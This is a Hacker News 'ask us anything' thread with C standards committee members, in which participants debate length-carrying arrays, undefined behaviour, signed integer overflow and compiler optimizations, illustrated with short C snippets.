Hacker News new | past | comments | ask | show | jobs | submit login
Tell HN: C Experts Panel – Ask us anything about C
829 points by rseacord on April 14, 2020 | hide | past | favorite | 962 comments
Hi HN,

We are members of the C Standard Committee and associated C experts, who have collaborated on a new book called Effective C, which was discussed recently here: https://news.ycombinator.com/item?id=22716068. After that thread, dang invited me to do an AMA and I invited my colleagues so we upgraded it to an AUA. Ask us about C programming, the C Standard or C standardization, undefined Behavior, and anything C-related!

The book is still forthcoming, but it's available for pre-order and early access from No Starch Press: https://nostarch.com/Effective_C.

Here's who we are:

rseacord - Robert C. Seacord is a Technical Director at NCC Group, and author of the new book by No Starch Press “Effective C: An Introduction to Professional C Programming” and C Standards Committee (WG14) Expert.

AaronBallman - Aaron Ballman is a compiler frontend engineer for GrammaTech, Inc. and works primarily on the static analysis tool, CodeSonar. He is also a frontend maintainer for Clang, a popular open source compiler for C, C++, and other languages. Aaron is an expert for the JTC1/SC22/WG14 C programming language and JTC1/SC22/WG21 C++ programming language standards committees and is a chapter author for Effective C.

msebor - Martin Sebor is Principal Engineer at Red Hat and expert for the JTC1/SC22/WG14 C programming language and JTC1/SC22/WG21 C++ programming language standards committees and the official Technical Reviewer for Effective C.

DougGwyn - Douglas Gwyn is Emeritus at US Army Research Laboratory and Member Emeritus for the JTC1/SC22/WG14 C programming language and a major contributor to Effective C.

pascal_cuoq - Pascal Cuoq is the Chief Scientist at TrustInSoft and co-inventor of the Frama-C technology. Pascal was a reviewer for Effective C and author of a foreword part.

NickDunn - Nick Dunn is a Principal Security Consultant at NCC Group, ethical hacker, software security tester, code reviewer, and major contributor to Effective C.

Fire away with your questions and comments about C!




All: this thread has almost 1000 comments and is paginated, so to see all of it you need to click More at the bottom of the page, or like this:

https://news.ycombinator.com/item?id=22865357&p=2

https://news.ycombinator.com/item?id=22865357&p=3

https://news.ycombinator.com/item?id=22865357&p=4

(Posts like this will go away once we turn off pagination.)


Are there any plans to "clean up C"? A lot of effort has been put into alternative languages, which are great, but there is still a lot of momentum with C, and it seems that a lot of improvements that could be done in a backwards compatible way and without introducing much in the way of complexity. For example:

- Locking down some categories of "undefined behaviour" to be "implementation defined" instead.

- Proper array support (which passes around the length along with the data pointer).

- Some kind of module system, that allows code to be imported with the possibility of name collisions.


There are "projects" underway to clean up the spec where it's viewed as either buggy, inconsistent, or underspecified. The atomics and threads sections are a coupled of example.

There are efforts to define the behavior in cases where implementations have converged or died out (e.g., twos complement, shifting into the sign bit).

There have been no proposals to add new array types and it doesn't seem likely at the core language level. C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)


> no such feature has emerged in practice

Arrays with length constantly emerge among C users and libraries. They are just all incompatible because without standardization there is no convergence.


I think the problem is that C is simply ill-suited for these "high level" constructs. The best you're likely to get is an ad-hoc special library like for wchar_t and wcslen and friends. Do we really want that?

I'd argue that linked list might make a better candidate for inclusions, because I've seen the kernel's list.h or similar implementations in many projects and that's stuff is trickier to get right than stuffing a pointer and a size_t in a struct.


Sounds like a good use of standardization. If there is existing implementation practice, please go ahead and submit a proposal. I would be happy to champion such a proposal if you can't attend in person.


It was an observation, not suggestion.

When the language standardization body has not managed to add arrays with length in 48 years, I don't think it should be added at this point. The culture is backward looking and incompatible with modern needs and people involved are old and incompatible with the future (no offense, so am I).

C standardization effort should focus on finishing the language, not developing it to match modern world. I have programmed with C over 20 years, since I was a teenager. It's has long been the system programming language I'm most familiar with. For the last 10 years I have never written an executable. Just short callable functions from other languages. Python, Java, Common Lisp, Matlab, and 'horrors or horrors' C++.

I think Standard C's can live next 50 years in gradual decline as portable assembler called from other languages and compilation target.

If I would propose new extension to C language, I would propose completely new language that can be optionally compiled into C and works side by side with old C code.


> If I would propose new extension to C language, I would propose completely new language that can be optionally compiled into C and works side by side with old C code.

There are a few somewhat popular languages that fit that description already, and none of them are suitable replacements for C (as far as I've seen). That's not to say there couldn't be a suitable replacement -- just that nobody in a position to do something about it wants the suitable replacement enough for it to have emerged, apparently.

I suspect the first really suitable complete replacement for C would be something like what Checked C [1] tried to be, but a little more ambitious and willing to include wholly new (but perhaps backward-compatible) features (like some of those you've proposed) implemented in an interestingly new enough way to warrant a whole new compile-to-C implementation. Something like that could greatly improve the use cases where a true C replacement would be most appreciated, and still fit "naturally" into environments where C is already the implementation language of choice via a piecemeal replacement strategy where the first step is just using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step).

1: https://www.microsoft.com/en-us/research/project/checked-c/


Sounds like you are describing Zig. https://ziglang.org


I haven't looked at Zig too closely yet (only started just a few minutes ago), but it immediately appears to me that this violates one of the requirements I suggested, as demonstrated by this use-case wish from my previous comment:

> > using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step)

I'll look into Zig more, though. Maybe I'll like it.

---

I stand corrected, given my phrasing. I should have specified that it needs to also support incrementally adding the new language's features while most of the code is still unaltered C, rather than (for instance) having to suddenly replace all the includes and function prototypes just because you want to add (in the case of Zig) an error "catch" clause.


You can use the Zig compiler to compile C with no modifications, and easily call C from Zig or Zig from C, so I'm not sure what more you're hoping for. A language that allows you to mix standard C and "improved C" in the same file sounds like a mess to me.


It depends on whether you're talking about an actual whole new, radically different language or something that is essentially C "with improvements". My point is not that C "with improvements" is the ideal approach, only that (at this time, for almost purely social reasons) I don't think C is really subject to replacement except by something that allows you to mix standard C and the "new language" because, apart from specific improvements, they are the same language.

This might come with huge drawbacks, but it still seems like the only socially acceptable way to fully replace C at this time; make it so you can replace it one line of code at a time in existing projects.


typedef struct {uint8_t *data; size_t len;} ByteBuf; is the first line of code I write in a C project.


Could you add some extra information why this is so helpful or handy to have? Think it will benefit readers that are starting out with C etc.


In C, dynamically-sized vectors don’t carry around size information with them, often leading to bugs. This struct attempts to keep the two together.


Memory corruption in sudo password feedback code happened because length and pointer sit as unrelated variables and have to be manipulated by two separate statements every time like some kind of manually inlined function. For comparison putty slice API handles slice as a whole object in a single statement keeping length and pointer consistent.


Another option is a struct with a FAM at the end.

  typedef struct {
      size_t len;
      uint8_t data[];
  } ByteBuf;
Then, allocation becomes

  ByteBuf *b = malloc(sizeof(*b) + sizeof(uint8_t) * array_size);
  b->len = array_size;
and data is no longer a pointer.


Well, your ByteBuf is still a pointer. You also now need to dereference it to get the length. It also can't be passed by value, since it's very big. You can also not have multiple ByteBufs pointing at subsections of the same region of memory.

Thing is, you rarely want to share just a buffer anyway. You probably have additional state, locks, etc. So what I do is embed my ByteBuf directly into another structure, which then owns it completely:

    typedef struct {
        ...
        ByteBuf mybuffer;
        ...
    } SomeThing;
So we end up with the same amount of pointers (1), but with some unique advantages.


Right, totally depends on what you're doing. My example is not a good fit for intrusive use cases.


sizeof(ByteBuf) == sizeof(size_t), and you can pass it by value; I just don't think you can do anything useful with it because it'll chop off the data.


This will an alignment problem on any platform with data types larger than size_t. You'd need an alignas(max_align_t) on the struct. At which point some people are going to be unhappy about the wasteful padding on a memory constrained target.


Why not typedef struct {uint8_t *data, dataend} ?

Makes it easier to take subranges out of it


should be

  typedef struct {uint8_t *data, *dataend} 
if I'm not mistaken :)


What are the advantages of saving the end as a pointer? Genuinely curious. Seems like a length allows the end pointer to be quickly calculated (data + len), while being more useful for comparisons, etc.


You can remove the first k elements of a view with data += k.

With the length you would need to do data += k; length -= k

Especially if you want to use it as safe iterator, you can do data++ in a loop


> ...You can remove the first k elements of a view with data += k.

How would you safely free(data) afterwards? You'd need to keep an alloc'ed pointer somehow.


Got it. That is really neat, going to add to my bag of tricks...


Right. I always think the pointer declaration is part of the type. (that is why I do not use C. Is there really a good reason for this C syntax?)


That's a really bizarre layout for your struct. Why don't you put the length first?


Why would it matter? The bytes aren't inline, this is just a struct with two word-sized fields.

A possible tiny advantage for this layout is that a pointer to this struct can be used as a pointer to a pointer-to-bytes, without having to adjust it. Although i'm not sure that's not undefined behaviour.


I don't think that's undefined behavior. That's how C's limited form of polymorphism is utilized. For example, many data structures behind dynamic languages are implemented in this way. A concrete example would be Python's PyObject which share PyObject_HEAD.

https://github.com/python/cpython/blob/master/Include/object...


I'm not sure if it matters. It might be better for some technical reason, such as speeding up double dereferences, because you don't need to add anything to get to the pointer. But to be honest I just copied it out of existing code.


Most platforms have instructions for dereferencing with a displacement.


The "existing practice" qualification refers to existing compiler extensions I'd guess. Then lobbying about the feature should be addressed to eg LLVM and GCC developers.


> C's charter is to standardize existing practice (as opposed to invent new features)

Passing a pair of arguments (pointer and a length) is surely one of the more universal conventions among C programmers?


When they say "existing practice" they mean things already implemented in compilers -- not existing practice among developers.


This seems like a poor way to establish criteria for standardization. It essentially encourages non-standard practice and discourages portable code by saying that to improve the language standard we have to have mutually incompatible implementations.

It has been said that design patterns (not just in the GOF sense of the term) are language design smells, implying that when very common patterns emerge it is a de facto popular-uprising call for reform. That, to me, is a more ideal criterion for updating a language standard, but practiced conservatively to avoid too much movement too fast or too much language growth.

On the other hand, I think you might be close to what they meant by "existing practice". I'm just disappointed to find that seems like the probable case (though I think it might also include some convergent evolutionary library innovations by OS devs as well as language features by compiler devs).


One of the principles for the C language is that you should be able to use C on pretty much any platform out there. This is one of the reasons that other languages are often written in C.

In order to uphold that principle, it's important that the standard consider not just "is this useful" but "is this going to be reasonably straightforward for compiler authors to add". Seeing that people have already implemented a feature helps C to avoid landing in the "useful feature which nobody can use because it's not widely available" trap. (For example, C99 made the mistake of adding floating-point complex types in <complex.h> -- but these ended up not being widely implemented, so C11 backed that out and made them an optional feature.)


Different implementations are used for different purposes. If 20% of implementations are used for purposes where a feature would be useful, which of the following would be best:

1. Have 10% of implementations support the feature one way, and 10% support it in an incompatible fashion.

2. Require that all compiler writers invest the time and necessary to support the feature without regard for whether any of their customers would ever use it.

3. Specify that implementations may either support the feature or report that they don't do so, at their leisure, but that implementations which claim to support the feature must do so in the manner prescribed by the Standard.

When C89 was written, the Committee decided that rather than recognizing different categories of implementation that support different sets of features, it should treat the question of what "popular extensions" to support as a Quality of Implementation which could be better resolved by the marketplace than by the Committee.

IMHO, the Committee should recognize categories of Safely Conforming Implementation and Selectively Conforming Program such that if an SCI accepts an SCP, and the translation and execution environments satisfy all documented requirements of the SCI and SCP, the program will behave as described by the Standard, or report in Implementation-Defined fashion an inability to do so, period. Any other behavior would make an implementation non-conforming. No "translation limit" loopholes.


That's obviously true, but at the same time the specifics of how one chooses to set criteria for inclusion in the standard should probably keep in mind the social consequences. If the intended consequence (e.g. ensuring that implementation is easy enough and desired enough to end up broadly included for portability) and the likely consequence (e.g. reduced standardization of C capabilities in practice, with rampant relianced by developers on implementation-specific behavior to the point almost nobody writes portable code any longer) differ too much, it's time to revisit the mechanisms that get us there.


What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code. This worked fine in an era where people were used to examining upon precedent to know how implementations intended for certain kinds of platforms and purposes should be expected to process certain constructs. Such an approach is becoming increasingly untenable, however.

If instead the Standard were to specify directives and say that if a program starts with directive X, implementations may either process integer overflow with precise wrapping semantics or refuse to process it altogether, if it starts with directive Y, implementations may either process it treating "long" as a 32-bit type or refuse to process it altogether, etc. this would make it much more practical to write portable programs. Not all programs would run on all implementations, but if many users of an implementation that targets a 64-bit platform need to use code that was designed around traditional microcomputer integer types, a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs.


> What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

That's a good question. I'm not sure I know. I could hazard a guess at what would be "best", but I'm not particularly confident in my thoughts on the matter at this time. As long as how that is handled is thoughtful, practical, consistent, and well-established, though, I think we're much more than halfway to the right answer.

> Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code.

If I understand correctly, that would actually be "implementation-defined", not "undefined".

> a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs

There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.


> If I understand correctly, that would actually be "implementation-defined", not "undefined".

That is an extremely common myth. From the point of view of the Standard, the difference between Implementation Defined behavior and Undefined Behavior is that implementations are supposed to document some kind of behavioral guarantee with regard to the former, even in cases where it would be impractical for a particular implementation to guarantee anything at all, and nothing that implementation could guarantee in those cases would be useful.

The published Rationale makes explicit an intention that Undefined Behavior, among other things, "identifies areas of conforming language extension".

> There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.

A major problem with the fixed-sized types is that their semantics are required to vary among implementations. For example, given

    int test(uint16_t a, uint16_t b, uint16_t c) { return a-b > c }
some implementations would be required to process test(1,2,3); so as to return 1, and some would be required to process it so as to return 0.

Further, if one has a piece of code which is written for a machine with particular integer types, and a compiler which targets a newer architecture but can be configured to support the old set of types, all one would need to do to port the code to the new platform would be to add a directive specifying the required integer types, with no need to rework the code to use the "fixed-sized" types whose semantics vary among implementations anyway.


What is your definition of "portable"? Are you using that term to mean "code I write for one platform can run without modification on other platforms" or "the language I use for one platform works on other platforms"?

I think when you get down to the level of C you're looking at the latter much more than the former. C is really more of a platform-agnostic assembler. It's not a design smell to have conventions within the group of language users that are de-facto language rules. For reference, see all the PEP rules about whitespace around different language constructs. These are not enforced.

The whole point of writing a C program is to be close to the addressable resources of the platform, so you'd probably want to expose those low-level constructs unless there's a compelling reason not to. Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own. And then I can also pass other information such as the platforms mutex or semaphore representation in the same data structure if I need to.

By the way, that convenient length+pointer array requires new language constructs for looping that are effectively syntactic sugar around the for loop. Or you need a way to access the members of the structure. And syntactic sugar constrains how you can use the construct. So I'm not sure that it adds anything to the language that isn't already there. And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.


> And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.

Given the prevalence of buffer overflow bugs in computing, I'd say that there are quite a few programmers who have quite a few issues with this concept in practice.

The rest of your arguments are quite sound, but I have to disagree with that one.


> What is your definition of "portable"?

In that particular statement at the beginning of my preceding comment, I meant portability across compiler implementations.

> Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own.

I meant to refer more to the idea that, when doing it on your own in a particular way, the compiler could support applying a (set of) constraint(s) to prevent overflows (as an example), such that any constraint couldn't be bypassed except by very obviously intentional means. Just automating the creation of the very, very simply constructed "plus a numeric field" struct seems obviously not worth including as a new feature of the standardized language.

> the fact that length+pointer is such a common construct indicates that most people don't have any issues with it

I think you're measuring the wrong kind of problem. Even C programmers with a high level of expertise may have problems with this approach, because it's when programmer error causes a problem not caught by code review or the compiler via buffer overflows (for instance) that we see a need for more.


>There have been no proposals to add new array types and it doesn't seem likely at the core language level.

One alternative to adding types is to allow enforcing consistency in some structs with the trailing array:

    struct my_obj {
      const size_t n;
      //other variables
      char text[n];
    };
where for simplicity you might only allow the first member to act as a length (and it must of course be constant). The point is that then the initializer:

    struct my_obj b = {.n = 5};
should produce an object of the right size. For heap allocation you could use something like:

    void * vmalloc(size_t base, size_t var, size_t cnt) {
      void *ret = malloc(base + var * cnt);
      if (!ret) return ret;
      * (size_t *) ret = cnt;
      return ret;
    }


What should happen if you reassign the object?


What do you mean "reassign"?

You can't reassign the length variable since it's marked `const`. You should see something like "warning: assignment discards `const` qualifier from pointer target type" if you pass it to `realloc`, which tells you that you're breaking consistency (I guess this might be UB). You could write `vrealloc` to allow resizing such structs, which would probably be called like:

    my_obj *tmp = vrealloc(obj, sizeof(obj), sizeof(obj->text), obj->n, newsize);


What would you do with the old text? Delete it?


Could you please be more specific about what you're trying to say? I have no idea what your actual objection is.


I would love this.


Actually there was no need to disenfranchise non-twos-complement architectures. Now that SIMH has a CDC-1700 emulation, I had planned on producing a C system for it as an example for students who have never seen such a model.


Rather than trying to decide whether to require that all implementations must use two's-complement math, or suggest that all programs should support unusual formats, the Standard should recognize some categories of implementations with various recommended traits, and programs that are portable among such implementations, but also recognize categories of "unusual" implementations.

Recognizing common behavioral characteristics would actually improve the usability of arcane hardware platforms if there were ways of explicitly requesting the commonplace semantics when required. For example, if the Standard defined an intrinsic which, given a pointer that is four-byte aligned, would store a 32-bit value with 8 bits per byte little-endian format, leaving the any bits beyond the eighth (if any) in a state which would be compatible with using "fwrite" to an octet-based stream, an octet-based big-endian platform could easily process that intrinsic as a byte-swap instruction followed by a 32-bit store, while a compiler for a 36-bit system could use a combination of addition and masking operations to spread out the bits.


This sounds like something memcpy would do already for you?


A 36-bit system with (it sounds like) 9-bit bytes stores bit 8 of a int in bit 8 of a char, and bit 9 of the int in bit 0 of the next char; memcpy won't change that. They're asking for somthing like:

  unsigned int x = in[0] + 512*in[1] + 512*512*in[2] + 512*512*512*in[3];
  /* aka x = *(int*)in */
  
  out[0] = x & 255; x>>=8;
  out[1] = x & 255; x>>=8;
  out[2] = x & 255; x>>=8;
  out[3] = x & 255;
  /* *not* aka *(int*)out = x */


The amount of effort for a compiler to process optimally all 72 variations of "read/write a signed/unsigned 2/4/8-byte big/little-endian value from an address that is aligned on a 1/2/4/8-byte boundary" would be less than the amount of effort required to generate efficient machine code for all the ways that user code might attempt to perform such an operation in portable fashion. Such operations would have platform-independent meaning, and all implementations could implement them in conforming fashion by simply including a portable library, but on many platforms performance could be enormously improved by exploiting knowledge of the target architecture. Having such functions/intrinsics in the Standard would eliminate the need for programmers to choose between portability and performance, by making it easy for a compiler to process portable code efficiently.


I'm not disagreeing, just showing code to illustrate why memcpy doesn't work for this. Although I do disagree that writing a signed value is useful - you can eliminate 18 of those variations with a single intmax_t-to-twos-complement-uintmax_t function (if you drop undefined behaviour for (unsigned foo_t)some_signed_foo this becomes a no-op). A set of sext_uintN functions would also eliminate 18 read-signed versions. Any optimizing compiler can trivially fuse sext_uint32(read_uint32le2(buf)), and minimal implementations would have less boilerplate to chew through.


> Although I do disagree that writing a signed value is useful

Although the Standard defines the behavior of signed-to-unsigned conversion in a way that would yield the same bit pattern as a two's-complement signed number, some compilers will issue warnings if a signed value is implicitly coerced to unsigned. Adding the extra 18 forms would generally require nothing more than defining an extra 24 macros, which seems like a reasonable way to prevent such issues.


Fair point; even if the combinatorical nature of it is superficially alarming, that's probably not a productive area to worry about feature creep in.


72 static in-line functions. If a compiler does a good job of handling such things efficiently, most of them could be accommodated by chaining to another function once or twice (e.g. to read a 64-bit value that's known to be at least 16-bit aligned, on a platform that doesn't support unaligned reads, read and combine two 32-bit values that are known to be 16-bit likewise).

Far less bloat than would be needed for a compiler to recognize and optimize any meaningful fraction of the ways people might write code to work around the lack of portably-specified library functions.


Ah, I see.


>clean up the spec

Would this involve further specification of bitfields? Feel implementation defined nature of bitfields limits potential


What parts of bitfields are implementation defined?


looking here https://en.cppreference.com/w/c/language/bit_field seems quite a bit. My main thought was how field's laid out in memory. Know would be big change with endianness but thought a standard check might be useful...?


> C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)

One thing that I'd really like to see would be some new categories of compliance. At present, the definition of "conforming C program" makes it possible to accomplish any task that could be done in any language with a "conforming C program", since the only thing necessary for something to be a conforming C program would be for there to exist some conforming implementation in the universe that accepts it. Unfortunately, the Standard says absolutely nothing useful about the effect of attempting to use an arbitrary conforming C program with an arbitrary conforming C implementation. It also fails to define a set of programs where it even attempts to say much of anything useful about the behavior of a freestanding implementation (since the only possible observable behavior of a strictly conforming program on a freestanding implementation would be `while(1);`).

I would propose defining the terms "Safely Conforming Implementation" and "Selectively Conforming Program" such that feeding any SCP to any SCI, in circumstances where the translation and execution environments satisfy all requirements documented for the program and implementation, would be required not to do anything other than behave as specified, or indicate in documented fashion a refusal to do so. An implementation that does anything else when given a Selectively-Conforming Program would not be Safely Conforming, and a program which a Safely Conforming Implementation could accept without its behavior being defined thereon would not be a Selectively Conforming Program.

While it might seem awkward to have many implementations support different sets of features, determining whether a Safely Conforming Implementation supports all the features needed for a Selectively Conforming Program would be trivially easy: feed the program to the implementation and see if it accepts it.

I think there's a lot of opposition to "optional" features because of a perception that features that are only narrowly supported are failures. I would argue the opposite. If 20% of compilers are used by people who would find a feature useful, having the feature supported by that 20% of compilers, while the maintainers of the other 80% direct their effort toward things other than support for the feature, should be seen as a superior outcome to mandating that compiler writers waste time on features that won't benefit their customers.

Realistically speaking, it would be impossible to define a non-trivial set of programs that all implementations must process in useful fashion. Instead of doing that, I'd say that the question of whether an implementation can usefully process any program is a Quality of Implementation issue, provided that implementations reject all programs that they can't otherwise process in any other conforming fashion.


I think we are always looking at ways to "clean up C" but that this has to be done very carefully not to break existing code. For example, the committee recently voted to remove support for function definitions with identifier lists from C2x http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2432.pdf At least one vendor was not very happy with this decision.

Undefined behaviors tend to be undefined for a reason and shouldn't be thought of as defects in the standard. In my years on the committee, I have always argued to define as much behavior as possible and to as narrowly define undefined behaviors as possible.

We also had a recent discussion about adding additional name spaces (when discussing reserved identifiers), but it didn't gain much traction.


C has strayed very far from the original intent because compiler authors prioritized benchmark results at the expense of real-world use cases. This bad trend needs to be reversed.

Consider signed integer overflow.

The intent wasn't that the compiler could generate nonsense code if the programmer overflowed an integer. The intent was the the programmer could determine what would happen by reading the hardware manual. You'd wrap around if the hardware naturally would do so. On some other hardware you might get saturation or an exception.

In other words, all modern computers should wrap. That includes x86, ARM, Power, Alpha, Itanium, SPARC, and just about everything else. I don't believe you can even buy non-wrapping hardware with a C99 or newer compiler. Since this is likely to remain true, there is no longer any justification for retaining undefined behavior that is getting abused to the detriment of C users.


There are some add-with-saturation opcodes in 8bit-element-size SIMD ISAs, I think that includes x86_64, some recent Nvidia GPUs, and the Raspberry Pi 1's VideoCore IV's strange 2D-register-file vector unit made for implementing stuff like VP8/H.264 on it. They are afaik always opt-in, though.


If most C developers wanted to trade the performance they get from the compiler being able to assume `n+1 > n` for signed integer n, it would happen.


Most of the useful optimizations that could be facilitated by treating integer overflow as jump the rails optimization could be facilitated just as well by allowing implementations to behave as though integers may sometimes, non-deterministically, be capable of holding values outside their range. If integer computations are guaranteed never to have side effects beyond yielding "weird" values, programs that exploit that guarantee may be processed to more efficient machine code than those which must avoid integer overflow at all costs.


How is this better behavior?


Many programs are subject to two constraints:

1. Behave usefully when practical, if given valid data.

2. Do not behave intolerably, even when given maliciously crafted data.

For a program to be considered usable, point #1 may be sometimes be negotiable (e.g. when given an input file which, while valid, is too big for the available memory). Point #2, however, should be considered non-negotiable.

If integer calculations that overflow are allowed to behave in loosely-defined fashion, that will often be sufficient to allow programs to meet requirement #2 without the need for any source or machine code to control the effects of overflow. If programmers have to take explicit control over the effects of overflow, however, that will prevent compilers from making of the any useful overflow-related options that would be consistent with loosely-defined behavior.

Under the kind of model I have in mind, a compiler would be allowed to treat temporary integer objects as being capable of holding values outside the range of their types, which would allow a compiler to optimize e.g. x*y/y to x, or x+y>y to x>0, but the effects of overflow would be limited to the computation of potentially weird values. If a program would meet requirements regardless of what values a temporary integer object holds, allowing such objects to acquire such weird values may be more efficient than requiring that programs write code to prevent computation of such values.


Intolerable is too situation specific.

Integer overflows that yield "weird values" in one place can easily lead to disasterous bugs in another place. So the safest thing in general would be to abort on integer overflow. But I'm sure there are applications where that, too, is intolerable. Kinda hard to have constraint 2 then.


Having a program behave in unreliably uselessly unpredictable fashion can only be tolerable in cases where nothing the program would be capable of doing would be intolerable. Such situations exist, but they are rare.

Otherwise, the question of what behaviors would be tolerable or intolerable is something programmers should know, but implementations cannot. If implementations offer loose behavioral guarantees, programmers can determine if they meet requirements. If an implementation offers no guarantees whatsoever, however, that is not possible.

If the only thing about overflow is that temporary values may hold weird results, and if certain operations upon a "weird" result (e.g. assignment to anything other than an automatic object whose address is never taken) will coerce it into a possibly-partially-unspecified number within type's range, then a program may ensure that behavior will be acceptable regardless of what weird values result from computation.

According to the published Rationale, the authors of C89 would have expected that something like:

    unsigned mul(unsigned short x, unsigned short y)
    { return (x*y); }
would on most implementations yield an arithmetically-correct result even for values of (x*y) between INT_MAX+1U and UINT_MAX. Indeed, I rather doubt they could imagine any compiler for a modern system would do anything other than yield an arithmetically-correct result or--maybe--raise a signal or terminate the program. In some cases, however, that exact function will disrupt the behavior of its caller in nonsensical fashion. Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?


> Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?

No, but in general I'm ok with integer overflows causing disruptions (and I'm happy that compilers provide an alternative, in the form of fwrapv, for those who don't care).

I do think that the integer promotions are a mistake. I would also welcome a standard, concise, built-in way to perform saturating or overflow-checked arithmetic that both detects overflows as well as allows you to ignore them and assume an implementation-defined result.

As it is, preventing overflows the correct way is needlessly verbose and annoying, and leads to duplication of apis (like reallocarray).


I wouldn't mind traps on overflow, though I think overflow reporting with somewhat loose semantics that would allow an implementation to produce arithmetically correct results when convenient, and give a compiler flexibility as to when overflow is reported, could offer much better performance than tight overflow traps. On the other hand, the above function will cause gcc to silently behave in bogus fashion even if the result of the multiplication is never used in any observable fashion.


It lets you check that a+b > a for unknown unsigned b or signed b known > 0, to make sure addition didn’t overflow. I’m rather certain all modern C compilers will optimize that check out.


Does it concern you how aggressively compiler teams are exploiting UB?


You do have to understand that compiler teams aren't saying something like "this triggers UB, quick just replace it with noop." It's just something that naturally happens when you need to reason about code.

For example, consider a very simple statement.

    let array[10];
    let i = some_function();
    print(array[i]);
The function might not even be known to the compiler at compilation time if it was from a DLL or something.

But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"


> But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"

As a developer who has seen lots of developers (including himself) make really dumb mistakes, this seems like a very strange statement.

Imagine if you hired a security guard to stand outside your house. One day, he sees you leave the house and forget to lock the door. So he reasons, "Oh, nothing important inside the house today -- guess I can take the day off", and walks off. That's what a lot of these "I can infer X must be true" reasonings sounds like to me: they assume that developers don't make mistakes; and that all unwanted behavior is exactly the same.

So suppose we have code that does this:

  int array[10];
  int i = some_function();

  /* Lots of stuff */
  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;
And then someone decides to add some optional debug logging, and forgets that `i` hasn't been sanitized yet:

  int array[10];
  int i = some_function();

  logf("old value: %d\n", array[i]);

  /* Lots of stuff */

  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;
Now reading `array[i]` if `i` > 10 is certainly UB; but in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

But suppose a clever compiler says, "We've accessed array[i], so I can infer that i < 10, and get rid of the check entirely!" Now we've changed an out-of-bounds read into an out-of-bounds write, which has changed worst-case a DoS into a privilege escalation!

I don't know whether anything like this has ever happened, but 1) it's certainly the kind of thing allowed by the spec, 2) it makes C a much more dangerous language to deal with.


Per https://lwn.net/Articles/575563/, Debian at one point found that 40% of the C/C++ programs that they have are vulnerable to known categories of undefined behavior like this which can open up a variety of security holes.

This has been accepted as what to expect from C. All compiler authors think it is OK. People who are aware of the problem are overwhelmed at the size of it and there is no chance of fixing it any time soon.

The fact that this has become to be seen as normal and OK, is an example of Normalization of Deviance. See http://lmcontheline.blogspot.com/2013/01/the-normalization-o... for a description of what I mean. And deviance will continue to be normalized right until someone writes an automated program that walks through projects, finds the surprising undefined behavior, and tries to come up with exploits. After project after project gets security holes, perhaps the C language committee will realize that this really ISN'T okay.

And the people who already migrated to Rust will be laughing their asses off in the corner.


Just to put in context how much they care, see when Morris worm happened.


> in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

I am not sure if a segfault is always the worst case. It could be by some coincidence that array[i] contains some confidential information [maybe part of a private key? 32 bits of the user's password?] and you've now written it to a log file.

I know it's hard to imagine a mis-read of ~32 bits would have bad consequences of that sort, but it's not out of the question.


Misreads of much less than that have been exploitable in the past.


Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.


> Depends a lot on the specifics. For example heartbleed was a misread that led to the buffer being sent on the socket. And I think it was more than 32 bits. 32 bits of garbage into a log file that needs privileges to read sounds a tad less scary, but like I say, not out of the question to be harmful.

If you can do it a lot of times, though, that changes matters.


32 bits is plenty to effectively break ASLR or significantly weaken a cryptographic key.


I would be more concerned by the fact that if i is 10, then you already are in trouble ;)


This is a good example. Let me flesh it out a bit more to illustrate a specific instance of this problem:

  int a[2][2];
  int f (int i, int j)
   {
       int t = a[1][j];
       a[0][i] = 0;          // cannot change a[1]
       return a[1][j] - t;   // can be folded to zero
   }
The language says that elements of the matrix a must only be accessed by indices that are valid for each bound, so compilers can and some do optimize code based on that requirement (see https://godbolt.org/z/spSF8e).

But when a program breaks that requirement (say, by calling f(2, 0)) the function will likely return an unexpected value.


But I don't know what you want to happen in this case? If you actually call f(2,0) then the program makes no sense. How can you have an expected value for a function call that violates its preconditions?


Based on the memory layout of arrays, which AFAIK is defined rather strictly by the standard, a[0][2] will be the same as a[1][0].


> ["]I can use that information!"

